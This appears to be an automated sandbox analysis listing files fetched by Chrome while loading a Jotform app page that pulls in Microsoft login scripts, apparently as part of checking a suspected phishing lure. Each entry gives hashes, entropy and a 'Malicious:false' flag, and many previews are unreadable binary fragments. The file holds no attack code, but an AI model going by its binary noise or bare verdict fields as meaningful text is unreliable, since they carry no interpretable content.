                                                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):122725
                                                                                                                                                                                                                                            Entropy (8bit):7.997347629519925
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                                                                                                                                                                                            MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                                                                                                                                                                                            SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                                                                                                                                                                                            SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                                                                                                                                                                                            SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_n7VKwtWYm2mBLcIKAZfQlw2.js
                                                                                                                                                                                                                                            Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 69055, version 3.0
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):69055
                                                                                                                                                                                                                                            Entropy (8bit):7.9965577137904935
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:1536:3lyxcwfWnFxw/1ZiGKvuUH/QFOAHlANdVfxrWS6HDnX8y:3lyxcwfWnFxEiGKNQYk+jfxr6jr
                                                                                                                                                                                                                                            MD5:EF5660E92EBB4915A6330A611A2A52AE
                                                                                                                                                                                                                                            SHA1:B91817F84EBA76DE4BA27D9B561C2600DB187FD8
                                                                                                                                                                                                                                            SHA-256:258E5A96A9BBFDA38743ABF0AD8C61751F86D907108F204ACC4F46DB5A871018
                                                                                                                                                                                                                                            SHA-512:5F69A9F6312D1E6D10AA1D9DDD1AE5735ACF16D8CB8AA0B7205AD5CB0A30C2482EDA6076D559CD735F3BF6F3D6194395B77447907D7F2D3D8455D31629334C7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff2
                                                                                                                                                                                                                                            Preview:wOF2...............(...............................|..h..w.`....^..s.....|......8.6.$..L..P.. ........q[.R...5..o..8..a.6...U....8..r..8.96...2....9....UV.b,.............".lw..k "...h......9...J.)J^PB.DUN..JfR...y+..\-u.kT.H.u.i.....v.r.F..yH!q-.rRnf.:....{8.U:HR.$G8.+.....B.!.I.k.r...(.......w..p..=O.....N.s.7.Zud.u..X....U...xP(^..?.C.*i....KD...L.q.......S.9;....r..?(.n.....ag........E.w....>.U.......k.7A..0p...48...j&......ex..#[4.9...._...k.YY.N....=...S..*GL.o^yV.....Y.._......^..E.x.M.?Q.."...7wx..A.dD4.*K~..?M|...........l..Zu.u...t.."$!i..(.7^.7.A...d...xj.8.P.r@..y...g5xx.......yB..>ZweB...Z.\D.QM....*;).^=@m.5......H...@.....(L.3I/.Fl.}.?.^.?.^~. .N..$..q..B.Z.C.[...M..B.$.@H ...)=.."-.)..EP..c.X..b<..W...Z.......T..E....xk.p.v.g...s..W,`.*G..N.=U$..F.,lG4..q*d}b.I....{.2.q.L..q.N ...J.+81[....-\........@C......{.....4..#..m...qy..l{._........k@%.uN...g....b+..e.[... wU...i./..$..o.4.0..7..n...V..(X...Q.1..L......./._........_.U}.U.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):122725
                                                                                                                                                                                                                                            Entropy (8bit):7.997347629519925
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                                                                                                                                                                                            MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                                                                                                                                                                                            SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                                                                                                                                                                                            SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                                                                                                                                                                                            SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 89 x 96, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):61
                                                                                                                                                                                                                                            Entropy (8bit):3.949386794740199
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:yionv//thPlU3lU5bHxl/k4E08up:6v/lhPie5bH7Tp
                                                                                                                                                                                                                                            MD5:AB1E375E29163851FBE05D1482DEF406
                                                                                                                                                                                                                                            SHA1:67398EF5FC9022802F127AE12BA0B494B2F81479
                                                                                                                                                                                                                                            SHA-256:D7FF860BB4EDEAA96D50F127F9D3023635B8959A2992A3740F2999194FC63346
                                                                                                                                                                                                                                            SHA-512:FFDA9ED851117EE98C4D770698C88C51A045A34C609B2C172FDFA2875092C77932C1E97CB53734941E249DAA255A693449E2E4D0787E8BA1DA2116ADC322B880
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ffcb6abdab37d06/1736512597511/3H40ckXZIbhbHk8
                                                                                                                                                                                                                                            Preview:.PNG........IHDR...Y...`.......I.....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4096), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                                                            Entropy (8bit):5.042681507029249
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:l1J1vq9QmoOueZEgNDjvFfv6kY1an0L9LNL4FGVMh6MyqIT:lvVgKQLAkY115LNLsCM4Me
                                                                                                                                                                                                                                            MD5:51592CC10DC5512916C14764FBC673D6
                                                                                                                                                                                                                                            SHA1:DB4E26B3EC4F714A9C3A0C9A3986757DA26665FD
                                                                                                                                                                                                                                            SHA-256:B451822F68E98FDE3B2728A3BF9EEC827CCC480D5F23188BD657CC6E76606ABA
                                                                                                                                                                                                                                            SHA-512:ED17ADFC2B1279433864DFC0EBAE343B9D92D2A569A41583AB3B82DDF16B7C25BD2D7D0749ADF3712FFC42A9574F836F52E81169C00B39D3EFA29BD720B06765
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/css/PublicAppContainer.0eeb5429.chunk.css
                                                                                                                                                                                                                                            Preview:.link-thumnail-wrapper{justify-content:center;align-items:center;display:flex}.link-thumnail-wrapper .linkThumbnail{border-radius:2px}.jfOverflowableList{flex-wrap:wrap;display:flex;overflow:hidden}.jfOverflowableList-item{flex-shrink:1;justify-content:center;align-items:center;display:flex}.jfOverflowableList-item.isOverflowItem{flex-grow:1}.jfOverflowableList-item[data-hidden=true]{opacity:0;visibility:hidden;pointer-events:none}.jfOverflowableList-overflow-items{flex-direction:column;max-height:min(50vh,320px);display:flex;overflow:auto}.jfOverflowableList-popover{display:flex}.jfOverflowableList-popover[data-popper-placement=top-end] .jfOverflowableList-overflow-items{flex-direction:column-reverse}.item-paragraph{word-wrap:break-word;white-space:pre-wrap;text-align:left;width:100%;line-height:normal;overflow-x:auto}.item-paragraph h1,.item-paragraph h2,.item-paragraph h3,.item-paragraph h4,.item-paragraph h5,.item-paragraph h6,.item-paragraph p{margin:revert;font-weight:revert;font
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):780925
                                                                                                                                                                                                                                            Entropy (8bit):4.121014646987528
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:pzpzlXl+DD/DCD/DCD/DD/DCD/DCD/DD/DCD/DCD/DDCD/DD/DCD/DCD/DD/DCD8:VpHUM2A
                                                                                                                                                                                                                                            MD5:A6604ABAADCF1A25A434A312AE70E0ED
                                                                                                                                                                                                                                            SHA1:E78CCA5BE7631D49BA661E7F328F5D98D7E5E22D
                                                                                                                                                                                                                                            SHA-256:1202C7B0881D7C5ABF572B1008B0361CF485298DDA5734A77B7919ECD809D06B
                                                                                                                                                                                                                                            SHA-512:28223E7D1DDB51B39C534642DD471A3F008BB8EE4B124BA469605875D9A12CF5E0A403D627C8FAA492E64C8EADF42318733138602AD6650FF0AD9CFF26CC82F8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn02.jotfor.ms/s/vendor/static/moment-timezone/0.5.43/moment-timezone-with-data.min.js
                                                                                                                                                                                                                                            Preview:!function(M,z){"use strict";"object"==typeof module&&module.exports?module.exports=z(require("moment")):"function"==typeof define&&define.amd?define(["moment"],z):z(M.moment)}(this,function(O){"use strict";void 0===O.version&&O.default&&(O=O.default);var z,W={},A={},c={},d={},R={},M=(O&&"string"==typeof O.version||C("Moment Timezone requires Moment.js. See https://momentjs.com/timezone/docs/#/use-it/browser/"),O.version.split(".")),b=+M[0],p=+M[1];function q(M){return 96<M?M-87:64<M?M-29:M-48}function o(M){var z=0,b=M.split("."),p=b[0],O=b[1]||"",A=1,c=0,b=1;for(45===M.charCodeAt(0)&&(b=-(z=1));z<p.length;z++)c=60*c+q(p.charCodeAt(z));for(z=0;z<O.length;z++)A/=60,c+=q(O.charCodeAt(z))*A;return c*b}function a(M){for(var z=0;z<M.length;z++)M[z]=o(M[z])}function L(M,z){for(var b=[],p=0;p<z.length;p++)b[p]=M[z[p]];return b}function n(M){for(var M=M.split("|"),z=M[2].split(" "),b=M[3].split(""),p=M[4].split(" "),O=(a(z),a(b),a(p),p),A=b.length,c=0;c<A;c++)O[c]=Math.round((O[c-1]||0)+6e4*O[c
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):673
                                                                                                                                                                                                                                            Entropy (8bit):7.6596900876595075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                                                                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                                                                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                                                                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                                                                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                                                                                                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2672
                                                                                                                                                                                                                                            Entropy (8bit):6.640973516071413
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                                                                                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                                                                                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                                                                                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                                                                                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (59987)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):60031
                                                                                                                                                                                                                                            Entropy (8bit):5.370598287940797
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:JYwYaYquvZBZtBS7FzHDGEu2A5t2D/lCt:WVDjTnBS5zHDEa4t
                                                                                                                                                                                                                                            MD5:700E9FCA74FA92077675421461929668
                                                                                                                                                                                                                                            SHA1:BE066A0B6073EB5174C0B2B8938163D3B37428FA
                                                                                                                                                                                                                                            SHA-256:8A5142932F28D4A6FAF0DD2BBB977415E96A4A59F06C7429473856F3E74F592C
                                                                                                                                                                                                                                            SHA-512:016C70A6D59B517C475098D543DCC90A9CA588BEBAD472931496EFE2341385A2CCE774EA5FD71841D0E472CED30386AB6EF913E132F3C7B910E3F3007FB8C19E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn01.jotfor.ms/s/umd/674ac14411e/for-csa-timeout.js
                                                                                                                                                                                                                                            Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports["for-csa-timeout"]=t():e["for-csa-timeout"]=t()}(this,function(){return function(){var e={23715:function(e,t,r){var n=r(56037),o=r(37609),i=r(29391),s=r(94191),a=r(42721);function l(e){var t=-1,r=null==e?0:e.length;for(this.clear();++t<r;){var n=e[t];this.set(n[0],n[1])}}l.prototype.clear=n,l.prototype.delete=o,l.prototype.get=i,l.prototype.has=s,l.prototype.set=a,e.exports=l},56629:function(e,t,r){var n=r(1171),o=r(67838),i=r(44859),s=r(4073),a=r(28541);function l(e){var t=-1,r=null==e?0:e.length;for(this.clear();++t<r;){var n=e[t];this.set(n[0],n[1])}}l.prototype.clear=n,l.prototype.delete=o,l.prototype.get=i,l.prototype.has=s,l.prototype.set=a,e.exports=l},91739:function(e,t,r){var n=r(83743)(r(92373),"Map");e.exports=n},10503:function(e,t,r){var n=r(73649),o=r(91186),i=r(59713),s=r(21431),a=r(36801);function l(e){var
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1899
                                                                                                                                                                                                                                            Entropy (8bit):5.335242648209657
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:YM9fdAIAvw1FAIAvEFAIAvyFAIAvsFAIAvB8sgFAIAvOJFAIAviI/t556bP:nfaMSsS6SUSLgSGJSKI/9EP
                                                                                                                                                                                                                                            MD5:B4EA4DC02EB5ACC676964AD501AFBE3E
                                                                                                                                                                                                                                            SHA1:13ABC1EDB14DC1A7AEDAE9424696B5DB6016AF7B
                                                                                                                                                                                                                                            SHA-256:C880F2584DBA00D1E4A356517C218CF8DE164C2BB3524B2F9C065194F0D20E21
                                                                                                                                                                                                                                            SHA-512:ABCBA9481B28DB5C39AE7E4FD1072ABA0626695369B5EC090619469EF9E016154A4346F0B43AF7AA850DE739426907CCBF682EF4F6BC1B5C7215F355E569822D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:{"name":"Gittens Murray Architects Ltd","short_name":"Gittens Murray Architects Ltd","description":"Scanned From : MPD609\n","scope":"\/app\/250092704521347","start_url":"\/app\/250092704521347?utm_source=jotform_pwa","display":"standalone","theme_color":"#ffffff","background_color":"#0A1551","icons":[{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=16&height=16&time=1736507717","sizes":"16x16","type":"image\/png"},{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=32&height=32&time=1736507717","sizes":"32x32","type":"image\/png"},{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=48&height=48&time=1736507717","sizes":"48x48","type":"image\/png"},{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=128&
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):2089
                                                                                                                                                                                                                                            Entropy (8bit):4.817837603181813
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:CzJRvwvP3hCXr5d55hLZ/iCPxLktGVHIauUYqyY+88:CzHQPRCb5XrZ/hL8G9Iaf0F88
                                                                                                                                                                                                                                            MD5:7636E568702AA2DF9B58805B8E6F936A
                                                                                                                                                                                                                                            SHA1:FACE085971A1F2E687FB74FB5133CDE33D377178
                                                                                                                                                                                                                                            SHA-256:DE1A906D599F6F88E96E6DC3760241A31D1B2DC5AAA509A67FC087E03805D206
                                                                                                                                                                                                                                            SHA-512:AD73EA907BFDAD08410B82EB8E0FD0B2C31916B4F631D0B16110F1191E2CF6EE7F171299A8D259A4177745055122DEC97D1257ED719F7E40E891DA88B6C3A2CC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://eu.jotform.com/app/250092704521347/serviceWorker.js
                                                                                                                                                                                                                                            Preview:/* eslint-disable no-undef,no-restricted-globals */.console.log('service worker succeed for app Gittens Murray Architects Ltd');..const cacheName = 'dynamic-v1-250092704521347';..try {. importScripts('https://cdn01.jotfor.ms/s/umd/674ac14411e/for-push-notification.js');. self['for-push-notification'].initialize({. resourceId: '250092704521347',. resourceType: 'portal'. });.} catch(err) {. console.error('Can not initialize push notification service worker handlers', err);.}..const corsPreferences = new Map();..self.addEventListener('fetch', (event) => {. if (event.request.destination !== 'image' || event.request.method !== 'GET') {. return;. }.. event.respondWith(caches.open(cacheName).then((cache) => {. return cache.match(event.request).then(async (cachedResponse) => {. if (cachedResponse) {. if (cachedResponse.type === 'opaque') {. fetch(event.request, { mode: "no-cors" }).then(response => {. cache.put(event.request, response.clone())
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):61
                                                                                                                                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):3693
                                                                                                                                                                                                                                            Entropy (8bit):4.869057565144107
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:WrqrQ0VDP9vB/P35HPFd7ivhfKtLu5Hg7ZvrWrMPbnVPIFzPp2sPF:WrqrVVD9vBn35vFdGvhitC5A7hrWrgbC
                                                                                                                                                                                                                                            MD5:FC99BE36A7ECB84D151F13EA0D504207
                                                                                                                                                                                                                                            SHA1:B54641C60D017AC6AD6AA949BFA28ECB9A09816C
                                                                                                                                                                                                                                            SHA-256:156E1E031B36D2B62F2FF9102B8D179350966CB5AEEC6B70A4AC7398D319805C
                                                                                                                                                                                                                                            SHA-512:A147270B8ECFE9E3B6D8CFE3501422FF1DF98B1867D79839BDDD32FF157E037297A8FEB1C5641F56F84447A0C7E5AE513F194334FF623D0EFB7E6D5017FC71F9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn.jotfor.ms/fonts/?family=Circular
